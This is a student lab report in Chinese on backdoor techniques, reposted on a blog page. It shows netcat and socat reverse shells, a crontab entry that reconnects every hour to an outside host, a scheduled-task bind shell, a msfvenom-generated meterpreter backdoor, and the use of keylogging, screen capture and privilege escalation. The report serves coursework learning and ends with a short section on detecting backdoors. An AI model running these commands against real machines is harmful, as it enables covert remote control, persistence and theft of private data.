20145206 邹京儒 《网络攻防》 后门原理与实践

最新推荐文章于 2024-09-27 15:09:29 发布
最新推荐文章于 2024-09-27 15:09:29 发布
阅读量131 收藏
点赞数
文章标签: 操作系统 shell 网络
原文链接:http://www.cnblogs.com/ZouJR/p/6551048.html
版权

20145206 邹京儒 《网络攻防》 后门原理与实践

一、实践过程记录

使用netcat获取主机操作Shell,cron启动

1、linux获取windows的shell:

从码云上下载ncat.rar(kali中已经自带):
877170-20170314212437901-1988523317.png
用ifconfig获取Kali的ip:
877170-20170314212813213-656627638.png
在kali下使用nc -l -p 5206来将5206设置成监听端口开始监听:
877170-20170314212919495-1914348835.png
windows下输入netcat.exe -e cmd 10.1.1.140 5206实现kali对windowsshell的控制:
877170-20170314213156213-1978227278.png

2、windows获取linux的shell:

利用ipconfig获取主机ip 10.1.1.162:
877170-20170314215531932-427248585.png

windows使用c:\你的nc的目录路径>ncat.exe -l -p 5206命令于5206端口进行监听。
877170-20170314215718120-1822557977.png

linux使用nc win的IP 5206 -e /bin/sh命令通过5206端口反弹连接windows主机
877170-20170314220005604-146068242.png

随后,我们在windows主机下就获得了linux的shell,可以运行linux下的指令并获取linux主机的信息,如ls指令:
877170-20170314215932745-1347682793.png

3、ncat传输文件:
由于我换了wifi,所以ip地址变了。。。
877170-20170315085844354-1672573336.png
如图所示,先在windows中打开监听,然后在linux系统中发送文件:
877170-20170315090739979-625433770.png
877170-20170315090807307-1945944546.png

传输的文件查看:
877170-20170315090607745-847148360.png
4、用crontab -e指令编辑一条定时任务,在最后一行添加02 * * * * /bin/netcat 172.20.10.3 5206 -e /bin/sh,意思是在每个小时的第02分钟反向连接Windows主机的5206端口
877170-20170316170653448-472268205.png
877170-20170316170726713-32797265.png
当时间到了02分时,此时已经获得了Kali的shell,可以输入指令
877170-20170316170832385-1343684788.png

使用socat获取主机操作Shell, 任务计划启动

1、以linux利用socat获取windows的shell为例
在Linux的终端上使用socat - tcp:win的IP:5206命令监听5206端口:
877170-20170315184039916-1858600243.png
win在命令行下使用socat tcp-listen:5206 exec:cmd,pty,stderr命令在5206端口反弹连接Linux
877170-20170315184157448-671483314.png
随即,Linux获得了win的shell:
877170-20170315184323682-354896762.png
2、任务计划启动
在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
877170-20170316154712245-174070864.png
在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5206 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5206,同时把cmd.exe的stderr重定向到stdout上:
877170-20170316155140776-2065864665.png

877170-20170315222441166-2127810269.png
877170-20170315222533401-511765659.png

使用MSF meterpreter生成可执行文件,利用ncat传送文件到主机并运行获取主机Shell

在Linux下使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=35206 -f exe >fool3.exe命令生成一个名为fool3.exe的后门程序:
877170-20170315191147073-421216501.png

877170-20170315191104057-1819027539.png

使用netcat将这个后门程序传送到Win主机:
在win的命令行下使用ncat.exe -lv 35206 > fool3.exe命令进行监听
877170-20170315192200385-477179906.png
随后在Linux下使用ncat -nv 172.30.6.174 35206 < fool3.exe命令把文件传送过去
877170-20170315192447088-1039581918.png
开启MSF监听进程
877170-20170315200356291-1226233265.png
877170-20170315200433854-633058430.png

877170-20170315200449276-213988589.png
双击运行win下的fool3.exe:
877170-20170315200539588-1206817725.png
877170-20170315200602620-1069769734.png

Linux就可以获得win的shell,进行远程控制了。

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

sysinfo查看系统版本信息:
877170-20170315201255495-62750463.png

screenshot直接对靶机屏幕截图:
877170-20170315201218495-1734190637.png

键盘记录内容:keyscan_start命令开始捕捉键盘记录;keyscan_dump命令停止键盘记录的捕捉并显示出来键盘的记录
877170-20170315202146807-30203164.png
在靶机安装一些系统服务
877170-20170315212836291-220359622.png
getsystem为提权命令,可以获取私人权限
877170-20170315212945385-774182088.png

二、基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?
可能操作系统自带后门,用户不知情,但开发方可以方便自己的权限。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
也许是在计算机上点击运行某个程序时,就会开启后门。
(3)Meterpreter有哪些给你映像深刻的功能?
可以捕获被攻击主机的屏幕和摄像头,在实验中实现了一下,觉得确实震撼到了我!
还有提权功能,看了其他同学的博客,好像win8不行,但我是win7~
(4)如何发现自己有系统有没有被安装后门?
有些拥有反向连接的后门可以用dos命令检测:这类后门一般会监听某个指定断口,要检查这类后门需要用到dos命令在没有打开任何网络连接页面和防火墙的情况下输入netstat -an 监听本地开放端口,看是否有本地ip连接外网ip。

三、实验总结与体会

通过本次实验,我了解了一些关于后门的相关知识,觉得其实后门挺可怕的,尤其是可以获取到被攻击主机的摄像头、屏幕、键盘时,可能某些个人隐私就会暴露!!!还有,本人使用的是win7,但听说使用win8,win10的朋友们在植入后门时都不同程度地受到了阻挠。。。然而win7好像并没有。。。我有点怀疑win7是不是有点弱smile~

转载于:https://www.cnblogs.com/ZouJR/p/6551048.html

weixin_30660027
关注
网络攻防原理与技术第3版课后习题参考答案
06-22
网络攻防原理与技术的知识点总结 本文总结了《网络攻防原理与技术(第 3 版)》课后习题参考答案中的重要知识点,涵盖网络安全、攻防技术、安全服务、身份鉴别、访问控制、加密、数字签名、安全机制等方面。 一、...
20155328 《网络攻防》实验二:后门原理实践
weixin_34221332的博客
04-02 606
20155328 《网络攻防》实验二:后门原理实践 实验问题回答 1.列举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站上下载软件时候的捆绑运行。 2.列举你知道的后门如何启动起来(win及linux)的方式? 恶意用户远程控制。 3.Meterpreter有哪些给你映像深刻的功能? 抓取摄像头,感觉像电影里的黑客镜头一样,很炫酷。还有击键记录。 4.如何发现自己有系统有没有被安装后...
20155222卢梓杰 实验二 后门原理实践
weixin_34019929的博客
04-03 150
实验二 后门原理实践 1.使用netcat获取主机操作Shell,cron启动 实验步骤如下 1.先试试win7控制linux 1.win7主机设置监听5222端口 2.linux靶机主动连接 3.成功启动控制台 2.再试试linux控制win7 1.linux主机设置监听5222端口 2.win7靶机主动连接 3.成功启动控制台 2.使用socat获取主机操作Shell...
网络对抗技术-Exp2-后门原理实践 20181314
weixin_46014245的博客
03-15 416
一、实验内容 1.使用netcat获取主机操作Shell,cron启动 Windows获得Linux Shell 在Windows下使用ipconfig查看本机IP win+r 输入cmd,打开监听 nc -l -p 1314 在kali中反弹连接Windows,nc 172.16.214.132 -e /bin/sh,使用-e选项执行shell程序 Windows成功获得kali的shell,利用ls,whoami指令查看相关信息 Linux获得Windows Shell 在kali中使用ifconfi
20145329 《网络对抗技术》后门原理实践
dgflxcwno867930904的博客
03-19 139
实验内容 (1)使用netcat获取主机操作Shell,cron启动 (1分) (2)使用socat获取主机操作Shell, 任务计划启动 (1分) (3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(1分) (4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分) 基础问题...
20155304《网络对抗》Exp2 后门原理实践
04-04 167
20155332《网络对抗》Exp2 后门原理实践 实验内容 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF me...
网络安全之网络攻防教程
06-19
网络安全之网络攻防教程网络安全之网络攻防教程网络安全之网络攻防教程网络安全之网络攻防教程网络安全之网络攻防教程网络安全之网络攻防教程网络安全之网络攻防教程网络安全之网络攻防教程网络安全之网络攻防教程...
无线网络攻防原理实践
06-07
无线网络攻防原理实践
网络攻防技术与实践
11-17
在介绍每一部分网络攻防技术之后,通过一些自主设计, 和从社区借鉴的实践作业,来引导读者在具体实战答题过程中,更加深入, 地去理解所讲解的攻防理论知识与技术原理,并培养核心的安全攻防实战,技能。
网络攻防实践_课程报告.zip
07-19
网络攻防实践_课程报告.zip
如何启动netcat_Netcat用法--获得对Shell的远程访问
weixin_39735005的博客
12-19 321
有些人希望在远程服务器上进入熟悉的DOS提示状态。这时,可以在一台Windows系统的DOS提示符下运行nc.exe-l-p4455-ecmd.exe命令,这样任何远程登录到端口4455的Telnet甚至都不需要登录就可以看到一个DOSShell。1)连接到REMOTE主机,例子:格式:nc-nvv192.168.x.x80讲解:连到192.168.x.x的TCP80端口2)监听LOCAL主机,例...
Linux三剑客(grep、sed、awk)【三、awk】
qq_44799103的博客
09-23 703
awk 必须 外层单引号,内层双引号内置变量 $1 $2 都不得加双引号,否则会识别为文本,尽量别加引号awk '{print "第一列:" $1, "第二列:" $2}' tmp.txt",name}'laomao#间接引用shell变量。
深入理解Linux进程机制
TravisBytes的博客
09-25 992
进程是 Linux 操作系统中管理和调度程序执行的核心概念。理解进程的生命周期、状态、创建与控制机制,以及进程间通信方式,对于系统开发、性能优化和故障排除具有重要意义。通过熟练掌握相关命令和工具,可以有效地管理和监控系统中的进程,确保系统的稳定和高效运行。
【Linux实践】实验四:Shell实用功能及文件权限
Fulling的博客
09-25 708
实验内容 1、使用命令“cat /etc/named.conf”设置为别名named,然后再取消别名。 2、使用echo命令和输出重定向创建文本文件/root/nn,内容是hello,然后再使用追加重定向输入内容为word。 3、使用管道方式分页显示/etc/passwd的内容。 4、分别用文字设定法和数字设定法,对/root/ab文件设置权限,所有者为读取、写入和执行权限,同组用户为读取和写入权限,其他用户没有任何权限。 5、将文件/root/ab所有者更改为用户zhangsan。 6、将目录/root/
Linux入门学习:进程概念
Lvision2的博客
09-24 1060
在课本的概念中,进程程序的一个执行实例,正在执行的程序。其内核观点:担当分配系统资源(CPU时间,内存)的实体。但这些概念太笼统,并不能让我们更加清晰的知道进程是什么,实际上,进程是内核数据结构(pcb) + 程序的代码与数据。pcb(process control block)进程控制块,进程信息被放在一个叫pcb的数据结构中,可以理解为进程属性的集合。在Linux入门学习:深刻理解计算机硬件与OS体系中,我们已经了解到。
恢复数据解决方案 :因意外删除而丢失重要数据的痛苦急救方法
GEEKVIP的博客
09-24 771
Geekersoft iPhone 数据恢复工具具有恢复丢失的虚假数据的潜在方法。该应用程序使用的方法为您提供系统以及常规应用程序的任何数据备份和恢复解决方案。数据恢复工具的安装方式很简单,只需下载文件并立即安装即可。您可以从Geekersoft iPhone 数据恢复官方网站下载安装包文件。包文件大小为 几十MB,可立即下载,网速很快。软件的安装过程相对简单,只需单击几下即可直接打开该工具。
【Linux:共享内存】
2201_75755162的博客
09-19 713
共享内存不随着进程的结束就释放,因为共享内存不属于进程而属于操作系统,需要手动释放或者后续其它系统调用。共享内存的生命周期随内核。
Docker入门
最新发布
qq_45027843的博客
09-27 902
命令标准化:Docker提供了一系列的命令,可以直接通过命令的方式完成 指派封装集装箱,运输集装箱,集装箱内的内容的运行。Docker运行的是集装箱内的内容,在Linux内核中,开辟一片独立空间,不会影响Linux的其他内容。到了2013年的时候,像亚马逊,微软,谷歌 这样的大公司都开始做pass平台,使得他们公司面临危机。运输的标准化:Docker有一个码头,所有的集装箱都放在码头,谁需要直接去获取就可以。一帮年轻人,开了一家公司,在2010年的时候开始做pass平台,当时发展的极其好。
Linux项目自动化构建工具-make/Makefile
m0_73936730的博客
09-22 1154
本文介绍make/makefile的基本概念和怎样使用,图文并茂地让读者快速了解并上手make/makefile。
网络攻防对抗实验教程:攻防策略与技术实践
该书涵盖了网络攻击和防御两个主要方面,帮助学生理解网络攻击的步骤、技术原理和防御措施,以提升他们在网络安全领域的实践能力。实验内容依据网络攻防的基本技能、网络攻击、网络防御的顺序设计,涉及攻击身份隐藏...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值